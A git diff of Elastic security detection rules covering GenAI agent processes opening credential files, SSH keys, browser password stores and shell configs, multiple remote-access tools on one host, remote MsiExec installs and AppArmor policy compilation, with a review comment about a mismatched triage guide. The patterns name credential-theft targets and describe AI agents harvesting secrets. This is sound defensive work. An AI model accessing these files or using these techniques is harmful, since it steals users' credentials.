"Permission Groups Discovery", - "reference": "https://attack.mitre.org/techniques/T1069/" - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "eql", - "version": 5 - }, - "id": "bf8c007c-7dee-4842-8e9a-ee534c09d205_5", - 
"type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/c0136397-f82a-45e5-9b9f-a3651d77e21a_4.json b/packages/security_detection_engine/kibana/security_rule/c0136397-f82a-45e5-9b9f-a3651d77e21a_4.json new file mode 100644 index 00000000000..bf88e70e81b --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/c0136397-f82a-45e5-9b9f-a3651d77e21a_4.json 
@@ -0,0 +1,123 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects when GenAI tools access sensitive files such as cloud credentials, SSH keys, browser password databases, or shell configurations. Attackers leverage GenAI agents to systematically locate and exfiltrate credentials, API keys, and tokens. Access to credential stores (.aws/credentials, .ssh/id_*) suggests harvesting, while writes to shell configs (.bashrc, .zshrc) indicate persistence attempts. Note: On linux only creation events are available. Access events are not yet implemented.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.file*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "GenAI Process Accessing Sensitive Files", + "note": "## Triage and analysis\n\n### Investigating GenAI Process Accessing Sensitive Files\n\nThis rule detects GenAI tools accessing credential files, SSH keys, browser data, or shell configurations. While GenAI tools legitimately access project files, access to sensitive credential stores is unusual and warrants investigation.\n\n### Possible investigation steps\n\n- Review the GenAI process that triggered the alert to identify which tool is being used and verify if it's an expected/authorized tool.\n- Investigate the user account associated with the GenAI process to determine if this activity is expected for that user.\n- Review the types of sensitive files being accessed (credentials, keys, browser data, etc.) 
to assess the potential impact of credential harvesting or data exfiltration.\n- Check for other alerts or suspicious activity on the same host around the same time, particularly network exfiltration events.\n- Verify if the GenAI tool or extension is from a trusted source and if it's authorized for use in your environment.\n- Determine if the GenAI process accessed multiple sensitive directories in sequence, an indication of credential harvesting.\n- Check if the GenAI tool recently created or accessed AI agent config files, which may contain instructions enabling autonomous file scanning.\n- Review whether the access was preceded by an MCP server, LangChain agent, or background automation.\n\n### False positive analysis\n\n- Automated security scanning or auditing tools that leverage GenAI may access sensitive files as part of their normal operation.\n- Development workflows that use GenAI tools for code analysis may occasionally access credential files.\n\n### Response and remediation\n\n- Immediately review the GenAI process that accessed the documents to determine if it's compromised or malicious.\n- Review, rotate, and revoke any API keys, tokens, or credentials that may have been exposed or used by the GenAI tool.\n- Investigate the document access patterns to determine the scope of potential data exfiltration.\n- Update security policies to restrict or monitor GenAI tool usage in the environment, especially for access to sensitive files.\n", + "query": "file where event.action in (\"open\", \"creation\", \"modification\") and event.outcome == \"success\" and\n\n // GenAI process \n (\n process.name in (\n \"ollama.exe\", \"ollama\", \"Ollama\",\n \"textgen.exe\", \"textgen\", \"text-generation-webui.exe\", \"oobabooga.exe\",\n \"lmstudio.exe\", \"lmstudio\", \"LM Studio\",\n \"claude.exe\", \"claude\", \"Claude\",\n \"cursor.exe\", \"cursor\", \"Cursor\",\n \"copilot.exe\", \"copilot\", \"Copilot\",\n \"codex.exe\", \"codex\",\n \"Jan\", \"jan.exe\", 
\"jan\",\n \"gpt4all.exe\", \"gpt4all\", \"GPT4All\",\n \"gemini-cli.exe\", \"gemini-cli\",\n \"genaiscript.exe\", \"genaiscript\",\n \"grok.exe\", \"grok\",\n \"qwen.exe\", \"qwen\",\n \"koboldcpp.exe\", \"koboldcpp\", \"KoboldCpp\",\n \"llama-server\", \"llama-cli\"\n ) or\n // OpenClaw/Moltbot/Clawdbot via Node.js\n (process.name in (\"node\", \"node.exe\") and\n process.command_line like~ (\"*openclaw*\", \"*moltbot*\", \"*clawdbot*\"))\n ) and\n\n // Sensitive file paths\n (\n // Persistence via Shell configs\n file.name in (\".bashrc\", \".bash_profile\", \".zshrc\", \".zshenv\", \".zprofile\", \".profile\", \".bash_logout\") or\n\n // Credentials In Files \n file.name like~ \n (\"key?.db\", \n \"logins.json\", \n \"Login Data\", \n \"Local State\",\n \"signons.sqlite\",\n \"Cookies\", \n \"cookies.sqlite\",\n \"Cookies.binarycookies\", \n \"login.keychain-db\", \n \"System.keychain\", \n \"credentials.db\", \n \"credentials\", \n \"access_tokens.db\", \n \"accessTokens.json\", \n \"azureProfile.json\",\n \"RDCMan.settings\", \n \"known_hosts\", \n \"KeePass.config.xml\", \n \"Unattended.xml\")\n ) and not (\n host.os.type == \"windows\" and\n process.name : (\"claude.exe\", \"Claude\") and\n file.path : (\"?:\\\\Users\\\\*\\\\AppData\\\\Roaming\\\\Claude\\\\Local State\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Packages\\\\Claude_*\\\\LocalCache\\\\Roaming\\\\Claude\\\\Local State\")\n )\n", + "references": [ + "https://atlas.mitre.org/techniques/AML.T0085", + "https://atlas.mitre.org/techniques/AML.T0085.001", + "https://atlas.mitre.org/techniques/AML.T0055", + "https://glama.ai/blog/2025-11-11-the-lethal-trifecta-securing-model-context-protocol-against-data-flow-attacks", + "https://www.elastic.co/security-labs/elastic-advances-llm-security", + "https://specterops.io/blog/2025/11/21/an-evening-with-claude-code" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + 
"name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.command_line", + "type": "wildcard" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "c0136397-f82a-45e5-9b9f-a3651d77e21a", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "OS: macOS", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Collection", + "Tactic: Credential Access", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", + "Domain: LLM", + "Mitre Atlas: T0085", + "Mitre Atlas: T0085.001", + "Mitre Atlas: T0055" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1555", + "name": "Credentials from Password Stores", + "reference": "https://attack.mitre.org/techniques/T1555/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0009", + "name": "Collection", + "reference": "https://attack.mitre.org/tactics/TA0009/" + }, + "technique": [ + { + "id": "T1005", + "name": "Data from Local System", + "reference": "https://attack.mitre.org/techniques/T1005/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 4 + }, + "id": "c0136397-f82a-45e5-9b9f-a3651d77e21a_4", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/c3f8a1d2-4b5e-4c6f-9a8b-1e2d3f4a5b6c_1.json b/packages/security_detection_engine/kibana/security_rule/c3f8a1d2-4b5e-4c6f-9a8b-1e2d3f4a5b6c_1.json new file mode 100644 index 00000000000..e6111941559 
--- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/c3f8a1d2-4b5e-4c6f-9a8b-1e2d3f4a5b6c_1.json 
@@ -0,0 +1,129 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies a Windows host where two or more distinct remote monitoring and management (RMM) or remote-access tool vendors are observed starting processes within the same eight-minute window. Legitimate MSP environments may run multiple tools, but this pattern can also indicate compromise, shadow IT, or attacker staging of redundant access. Processes are mapped to a single vendor label so multiple binaries from the same vendor do not inflate the count.", + "from": "now-9m", + "interval": "8m", + "language": "esql", + "license": "Elastic License v2", + "name": "Multiple Remote Management Tool Vendors on Same Host", + "note": "## Triage and analysis\n\n### Investigating Multiple Remote Management Tool Vendors on Same Host\n\nThis rule aggregates process start events by `host.id`, host name, and a nine-minute time bucket. Data can come from\nElastic Defend, Sysmon, Winlogbeat, Windows Security / forwarded events, Microsoft Defender for Endpoint, SentinelOne,\nCrowdStrike FDR, or Elastic Endgame\u2014where ECS process fields are populated. Each known RMM-related process name maps\nto one **vendor** label (e.g. TeamViewer, AnyDesk, ScreenConnect). 
If **two or more different vendor labels** appear in\nthe same bucket, the rule signals.\n\n### Possible investigation steps\n\n- Open **Esql.vendors_seen** and **Esql.processes_name_values** on the alert to see which tools fired in the window.\n- Confirm whether the host is an MSP-managed jump box, helpdesk workstation, or lab where multiple RMM stacks are expected.\n- For servers or standard user endpoints, treat as higher risk: review install source, code signatures, and recent logons.\n- Correlate with other alerts (ingress tool transfer, suspicious scripting, new persistence) on the same `host.id`.\n- Check asset inventory and change tickets for approved RMM software.\n\n### False positive analysis\n\n- **MSP / IT tooling**: A technician machine with two approved agents (e.g. RMM + remote support) may match. Tune with\n host or organizational unit exceptions, or raise the vendor threshold if your environment standardizes on a known pair.\n- **Vendor rebrands or bundles**: Rare overlaps during migrations can briefly show two vendors; validate timeline and packages.\n\n### Response and remediation\n\n- If unauthorized or unexplained: isolate the host, inventory installed remote-access software, remove unapproved tools,\n and reset credentials that may have been exposed. 
Enforce a single approved RMM stack per asset class where possible.\n", + "query": "from logs-endpoint.events.process-*, endgame-*, logs-crowdstrike.fdr*, logs-m365_defender.event-*, logs-sentinel_one_cloud_funnel.*, logs-system.security*, logs-windows.sysmon_operational-*, logs-windows.forwarded*, winlogbeat-* metadata _id, _version, _index\n| where (host.os.type == \"windows\" or host.os.family == \"windows\")\n and event.category == \"process\"\n and event.type == \"start\"\n and process.name is not null\n| eval Esql.rmm_vendor = case(\n process.name == \"AeroAdmin.exe\", \"AeroAdmin\",\n process.name == \"AnyDesk.exe\", \"AnyDesk\",\n process.name == \"AteraAgent.exe\", \"Atera\",\n process.name == \"AweSun.exe\", \"AweSun\",\n process.name like \"aweray_remote*.exe\", \"AweSun\",\n process.name == \"apc_Admin.exe\", \"APC\",\n process.name == \"apc_host.exe\", \"APC\",\n process.name == \"BASupSrvc.exe\", \"BeyondTrust\",\n process.name == \"bomgar-scc.exe\", \"BeyondTrust\",\n process.name == \"Remote Support.exe\", \"BeyondTrust\",\n process.name == \"B4-Service.exe\", \"BeyondTrust\",\n process.name == \"CagService.exe\", \"BarracudaRMM\",\n process.name == \"domotzagent.exe\", \"Domotz\",\n process.name == \"domotz-windows-x64-10.exe\", \"Domotz\",\n process.name == \"dwagsvc.exe\", \"DWService\",\n process.name == \"DWRCC.exe\", \"DWService\",\n process.name like \"fleetdeck_commander*.exe\", \"FleetDeck\",\n process.name == \"getscreen.exe\", \"GetScreen\",\n process.name == \"g2aservice.exe\", \"GoTo\",\n process.name == \"GoToAssistService.exe\", \"GoTo\",\n process.name == \"gotohttp.exe\", \"GoTo\",\n process.name == \"GoToResolveProcessChecker.exe\", \"GoTo\",\n process.name == \"GoToResolveUnattended.exe\", \"GoTo\",\n process.name == \"ImperoClientSVC.exe\", \"Impero\",\n process.name == \"ImperoServerSVC.exe\", \"Impero\",\n process.name == \"ISLLight.exe\", \"ISLOnline\",\n process.name == \"ISLLightClient.exe\", \"ISLOnline\",\n process.name == 
\"jumpcloud-agent.exe\", \"JumpCloud\",\n process.name == \"level.exe\", \"Level\",\n process.name == \"LvAgent.exe\", \"Level\",\n process.name == \"LMIIgnition.exe\", \"LogMeIn\",\n process.name == \"LogMeIn.exe\", \"LogMeIn\",\n process.name == \"ManageEngine_Remote_Access_Plus.exe\", \"ManageEngine\",\n process.name == \"MeshAgent.exe\", \"MeshCentral\",\n process.name == \"meshagent.exe\", \"MeshCentral\",\n process.name == \"Mikogo-Service.exe\", \"Mikogo\",\n process.name == \"NinjaRMMAgent.exe\", \"NinjaOne\",\n process.name == \"NinjaRMMAgenPatcher.exe\", \"NinjaOne\",\n process.name == \"ninjarmm-cli.exe\", \"NinjaOne\",\n process.name == \"parsec.exe\", \"Parsec\",\n process.name == \"PService.exe\", \"Pulseway\",\n process.name == \"r_server.exe\", \"Radmin\",\n process.name == \"radmin.exe\", \"Radmin\",\n process.name == \"radmin3.exe\", \"Radmin\",\n process.name == \"rserver3.exe\", \"Radmin\",\n process.name == \"vncserver.exe\", \"RealVNC\",\n process.name == \"vncviewer.exe\", \"RealVNC\",\n process.name == \"winvnc.exe\", \"RealVNC\",\n process.name == \"ROMServer.exe\", \"RealVNC\",\n process.name == \"ROMViewer.exe\", \"RealVNC\",\n process.name == \"RemotePC.exe\", \"RemotePC\",\n process.name == \"RemotePCDesktop.exe\", \"RemotePC\",\n process.name == \"RemotePCService.exe\", \"RemotePC\",\n process.name == \"RemoteDesktopManager.exe\", \"Devolutions\",\n process.name == \"RCClient.exe\", \"RPCSuite\",\n process.name == \"RCService.exe\", \"RPCSuite\",\n process.name == \"RPCSuite.exe\", \"RPCSuite\",\n process.name == \"rustdesk.exe\", \"RustDesk\",\n process.name == \"rutserv.exe\", \"RemoteUtilities\",\n process.name == \"rutview.exe\", \"RemoteUtilities\",\n process.name == \"saazapsc.exe\", \"Kaseya\",\n process.name like \"ScreenConnect*.exe\", \"ScreenConnect\",\n process.name == \"ScreenConnect.ClientService.exe\", \"ScreenConnect\",\n process.name == \"Splashtop-streamer.exe\", \"Splashtop\",\n process.name == \"strwinclt.exe\", 
\"Splashtop\",\n process.name == \"SRService.exe\", \"Splashtop\",\n process.name == \"smpcview.exe\", \"Splashtop\",\n process.name == \"spclink.exe\", \"Splashtop\",\n process.name == \"rfusclient.exe\", \"Splashtop\",\n process.name == \"Supremo.exe\", \"Supremo\",\n process.name == \"SupremoService.exe\", \"Supremo\",\n process.name == \"Syncro.Overmind.Service.exe\", \"Splashtop\",\n process.name == \"SyncroLive.Agent.Runner.exe\", \"Splashtop\",\n process.name == \"Syncro.Installer.exe\", \"Splashtop\",\n process.name == \"tacticalrmm.exe\", \"TacticalRMM\",\n process.name == \"tailscale.exe\", \"Tailscale\",\n process.name == \"tailscaled.exe\", \"Tailscale\",\n process.name == \"teamviewer.exe\", \"TeamViewer\",\n process.name == \"ticlientcore.exe\", \"Tiflux\",\n process.name == \"TiAgent.exe\", \"Tiflux\",\n process.name == \"ToDesk_Service.exe\", \"ToDesk\",\n process.name == \"twingate.exe\", \"Twingate\",\n process.name == \"tvn.exe\", \"TightVNC\",\n process.name == \"tvnserver.exe\", \"TightVNC\",\n process.name == \"tvnviewer.exe\", \"TightVNC\",\n process.name == \"winwvc.exe\", \"TightVNC\",\n process.name like \"UltraVNC*.exe\", \"UltraVNC\",\n process.name like \"UltraViewer*.exe\", \"UltraViewer\",\n process.name like \"AA_v*.exe\", \"AnyAssist\",\n process.name == \"Velociraptor.exe\", \"Velociraptor\",\n process.name == \"ToolsIQ.exe\", \"ToolsIQ\",\n process.name == \"session_win.exe\", \"ZohoAssist\",\n process.name == \"Zaservice.exe\", \"ZohoAssist\",\n process.name == \"ZohoURS.exe\", \"ZohoAssist\",\n \"\"\n )\n| where Esql.rmm_vendor != \"\" and Esql.rmm_vendor is not NULL\n| stats Esql.vendor_count = count_distinct(Esql.rmm_vendor),\n Esql.vendors_seen = values(Esql.rmm_vendor),\n Esql.processes_executable_values = values(process.executable),\n Esql.first_seen = min(@timestamp),\n Esql.last_seen = max(@timestamp)\n by host.name, host.id\n| where Esql.vendor_count >= 2\n| sort Esql.vendor_count desc\n| keep host.id, host.name, 
Esql.*\n", + "references": [ + "https://attack.mitre.org/techniques/T1219/", + "https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-025a" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^3.0.0" + }, + { + "package": "sentinel_one_cloud_funnel", + "version": "^1.0.0" + }, + { + "package": "m365_defender", + "version": "^3.0.0" + }, + { + "package": "system", + "version": "^2.0.0" + }, + { + "package": "crowdstrike", + "version": "^3.0.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "Esql.first_seen", + "type": "date" + }, + { + "ecs": false, + "name": "Esql.last_seen", + "type": "date" + }, + { + "ecs": false, + "name": "Esql.processes_executable_values", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql.vendor_count", + "type": "long" + }, + { + "ecs": false, + "name": "Esql.vendors_seen", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "c3f8a1d2-4b5e-4c6f-9a8b-1e2d3f4a5b6c", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Command and Control", + "Resources: Investigation Guide", + "Data Source: Elastic Defend", + "Data Source: Sysmon", + "Data Source: SentinelOne", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: CrowdStrike", + "Data Source: Windows Security Event Logs", + "Data Source: Elastic Endgame", + "Data Source: Winlogbeat" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1219", + "name": "Remote Access Tools", + "reference": "https://attack.mitre.org/techniques/T1219/", + "subtechnique": [ + { + "id": "T1219.002", + "name": "Remote Desktop 
Software", + "reference": "https://attack.mitre.org/techniques/T1219/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "esql", + "version": 1 + }, + "id": "c3f8a1d2-4b5e-4c6f-9a8b-1e2d3f4a5b6c_1", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/c9847fe9-3bed-4e6b-b319-f9956d6dd02a_2.json b/packages/security_detection_engine/kibana/security_rule/c9847fe9-3bed-4e6b-b319-f9956d6dd02a_2.json new file mode 100644 index 00000000000..372b875793b --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/c9847fe9-3bed-4e6b-b319-f9956d6dd02a_2.json 
@@ -0,0 +1,129 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies attempts to install a file from a remote server using MsiExec. Adversaries may abuse Windows Installers for initial access and delivery of malware.", + "from": "now-9m", + "index": [ + "endgame-*", + "logs-crowdstrike.fdr*", + "logs-endpoint.events.process-*", + "logs-m365_defender.event-*", + "logs-sentinel_one_cloud_funnel.*", + "logs-system.security*", + "logs-windows.forwarded*", + "logs-windows.sysmon_operational-*", + "winlogbeat-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Remote Install via MsiExec", + "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Potential Remote Install via MsiExec\n\nMsiExec is a Windows utility for installing, maintaining, and removing software. Adversaries exploit it to execute malicious payloads by disguising them as legitimate installations. The detection rule identifies suspicious child processes spawned by MsiExec that initiate network activity, which is atypical for standard installations. 
By focusing on unusual executable paths and network connections, the rule helps uncover potential misuse indicative of malware delivery or initial access attempts.\n\n### Possible investigation steps\n\n- Review the process tree to identify the parent and child processes of the suspicious MsiExec activity, focusing on the process.entity_id and process.parent.name fields to understand the execution flow.\n- Examine the process.executable path to determine if it deviates from typical installation paths, as specified in the query, to assess the likelihood of malicious activity.\n- Analyze the network or DNS activity associated with the process by reviewing the event.category field for network or dns events, and correlate these with the process.name to identify any unusual or unauthorized connections.\n- Check the process.args for any unusual or suspicious command-line arguments that might indicate an attempt to execute malicious payloads or scripts.\n- Investigate the host's recent activity and security logs to identify any other indicators of compromise or related suspicious behavior, leveraging data sources like Elastic Defend, Sysmon, or SentinelOne as mentioned in the rule's tags.\n- Assess the risk and impact of the detected activity by considering the context of the alert, such as the host's role in the network and any potential data exposure or system compromise.\n\n### False positive analysis\n\n- Legitimate software installations or updates may trigger the rule if they involve network activity. Users can create exceptions for known software update processes that are verified as safe.\n- Custom enterprise applications that use MsiExec for deployment and require network access might be flagged. Identify these applications and exclude their specific executable paths from the rule.\n- Automated deployment tools that utilize MsiExec and perform network operations could be misidentified. 
Review these tools and whitelist their processes to prevent false alerts.\n- Security software or system management tools that leverage MsiExec for legitimate purposes may cause false positives. Confirm these tools' activities and add them to an exclusion list if necessary.\n- Regularly review and update the exclusion list to ensure it reflects the current environment and any new legitimate software that may interact with MsiExec.\n\n### Response and remediation\n\n- Isolate the affected system from the network immediately to prevent further malicious activity and lateral movement.\n- Terminate the suspicious child process spawned by MsiExec to halt any ongoing malicious operations.\n- Conduct a thorough scan of the affected system using updated antivirus or endpoint detection and response (EDR) tools to identify and remove any malicious payloads or remnants.\n- Review and analyze the process execution and network activity logs to identify any additional indicators of compromise (IOCs) and assess the scope of the intrusion.\n- Reset credentials and review access permissions for any accounts that may have been compromised or used during the attack.\n- Escalate the incident to the security operations center (SOC) or incident response team for further investigation and to determine if additional systems are affected.\n- Implement enhanced monitoring and detection rules to identify similar threats in the future, focusing on unusual MsiExec activity and network connections.", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.name : \"msiexec.exe\" and process.args : (\"-i*\", \"/i*\", \"-p*\", \"/p*\") and process.command_line : \"*http*\" and\n process.args : (\"/qn\", \"-qn\", \"-q\", \"/q\", \"/quiet\") and\n process.parent.name : (\"sihost.exe\", \"explorer.exe\", \"cmd.exe\", \"wscript.exe\", \"mshta.exe\", \"powershell.exe\", \"wmiprvse.exe\", \"pcalua.exe\", \"forfiles.exe\", \"conhost.exe\") and\n not 
process.command_line : (\"*--set-server=*\", \"*UPGRADEADD=*\" , \"*--url=*\",\n \"*USESERVERCONFIG=*\", \"*RCTENTERPRISESERVER=*\", \"*app.ninjarmm.com*\", \"*zoom.us/client*\",\n \"*SUPPORTSERVERSTSURI=*\", \"*START_URL=*\", \"*AUTOCONFIG=*\", \"*awscli.amazonaws.com*\")\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^3.0.0" + }, + { + "package": "system", + "version": "^2.0.0" + }, + { + "package": "m365_defender", + "version": "^3.0.0" + }, + { + "package": "sentinel_one_cloud_funnel", + "version": "^1.0.0" + }, + { + "package": "crowdstrike", + "version": "^3.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.command_line", + "type": "wildcard" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "c9847fe9-3bed-4e6b-b319-f9956d6dd02a", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Windows Security Event Logs", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: Sysmon", + "Data Source: SentinelOne", + "Data Source: Crowdstrike", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1218", + "name": "System Binary Proxy Execution", + "reference": "https://attack.mitre.org/techniques/T1218/", + "subtechnique": [ + { + "id": "T1218.007", + "name": 
"Msiexec", + "reference": "https://attack.mitre.org/techniques/T1218/007/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 2 + }, + "id": "c9847fe9-3bed-4e6b-b319-f9956d6dd02a_2", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/d19a2399-f8e2-4b10-80d8-a561ce9d24d1_1.json b/packages/security_detection_engine/kibana/security_rule/d19a2399-f8e2-4b10-80d8-a561ce9d24d1_1.json deleted file mode 100644 index 39ca8b9a3a2..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/d19a2399-f8e2-4b10-80d8-a561ce9d24d1_1.json +++ /dev/null 
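Review bot: The triage guide in `note` describes a different detection than the one in `query`: it tells the analyst to look at child processes spawned by MsiExec that make network or DNS connections, at `process.executable` paths and at `event.category` values for network or dns events, none of which the query uses. The query actually matches a `msiexec.exe` start event carrying an install/patch switch, an `http` substring in `process.command_line`, a quiet switch and one of the listed `process.parent.name` values, so an analyst following the guide will pivot on the wrong fields. Rewrite the "Investigating" and "Possible investigation steps" sections around `process.command_line`, `process.args` and `process.parent.name`, and around verifying the remote package URL and the parent that launched the install. Separately, the tag `Data Source: Crowdstrike` is spelled `Data Source: CrowdStrike` in the `c3f8a1d2…` rule earlier in this commit, so tag-based filtering will split the two; settle on one spelling.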
@@ -1,106 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "This rule detects the creation of a symbolic link from a system binary to a suspicious and writable location. This activity may indicate an attacker's attempt to evade detection by behavioral rules that depend on predefined process parent/child relationships. By executing the symlinked variant of a binary instead of the original, the attacker aims to bypass these rules. Through the new_terms rule type, this rule can identify uncommon parent processes that may indicate the presence of a malicious symlink.", - "from": "now-9m", - "history_window_start": "now-10d", - "index": [ - "logs-endpoint.events.process*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "System Binary Symlink to Suspicious Location", - "new_terms_fields": [ - "host.id", - "process.parent.name" - ], - "query": "host.os.type:linux and event.category:process and event.type:start and event.action:exec and process.parent.executable:* and\n(process.name:ln or process.name:busybox and process.args:ln or process.name:cp and process.args:--symbolic-link) and\nprocess.args:(\n (\n /bin/* or /lib/* or /lib64/* or /sbin/* or /usr/bin/* or /usr/lib/* or /usr/lib64/* or /usr/local/bin/* or\n /usr/local/lib/* or /usr/local/lib64/* or /usr/local/sbin/* or /usr/sbin/*\n ) and (\n /*/.* or /dev/shm/* or /home/* or /root/* or /tmp/* or /var/tmp/*\n ) and\n not (/usr/bin/coreutils or /tmp/mkinitcpio* or /var/tmp/dracut* or /var/tmp/mkinitramfs*)\n)\n", - "related_integrations": [ - { - "package": "endpoint", - "version": "^8.2.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.action", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.category", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.type", - "type": "keyword" - }, - { - "ecs": true, - "name": "host.os.type", - "type": "keyword" - }, - { - "ecs": true, - "name": "process.args", - "type": "keyword" - }, 
- { - "ecs": true, - "name": "process.name", - "type": "keyword" - }, - { - "ecs": true, - "name": "process.parent.executable", - "type": "keyword" - } - ], - "risk_score": 21, - "rule_id": "d19a2399-f8e2-4b10-80d8-a561ce9d24d1", - "severity": "low", - "tags": [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Data Source: Elastic Defend" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0005", - "name": "Defense Evasion", - "reference": "https://attack.mitre.org/tactics/TA0005/" - }, - "technique": [ - { - "id": "T1574", - "name": "Hijack Execution Flow", - "reference": "https://attack.mitre.org/techniques/T1574/" - }, - { - "id": "T1202", - "name": "Indirect Command Execution", - "reference": "https://attack.mitre.org/techniques/T1202/" - }, - { - "id": "T1564", - "name": "Hide Artifacts", - "reference": "https://attack.mitre.org/techniques/T1564/" - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "new_terms", - "version": 1 - }, - "id": "d19a2399-f8e2-4b10-80d8-a561ce9d24d1_1", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/d26331be-affe-46b2-bf4e-203d0e2d364c_1.json b/packages/security_detection_engine/kibana/security_rule/d26331be-affe-46b2-bf4e-203d0e2d364c_1.json new file mode 100644 index 00000000000..3f9fddca1ad --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/d26331be-affe-46b2-bf4e-203d0e2d364c_1.json 
@@ -0,0 +1,116 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects the execution of \"apparmor_parser\" using the \"-o\" option to write a compiled AppArmor profile to an output file. This functionality is normally used by system administration tools or package installation scripts when building or loading AppArmor policies. In adversarial scenarios, attackers may use \"apparmor_parser\" to compile custom AppArmor profiles that can later be loaded into the kernel through AppArmor policy management interfaces. Malicious profiles may weaken security controls, alter the behavior of privileged programs, or assist in exploitation chains involving AppArmor policy manipulation.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.process*", + "endgame-*", + "logs-crowdstrike.fdr*", + "logs-sentinel_one_cloud_funnel.*", + "logs-auditd_manager.auditd-*", + "auditbeat-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "AppArmor Profile Compilation via apparmor_parser", + "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating AppArmor Profile Compilation via apparmor_parser\n\nThis alert flags a Linux process using apparmor_parser to write a compiled AppArmor policy to disk, an action administrators and package scripts use but adversaries can abuse to stage policy changes. 
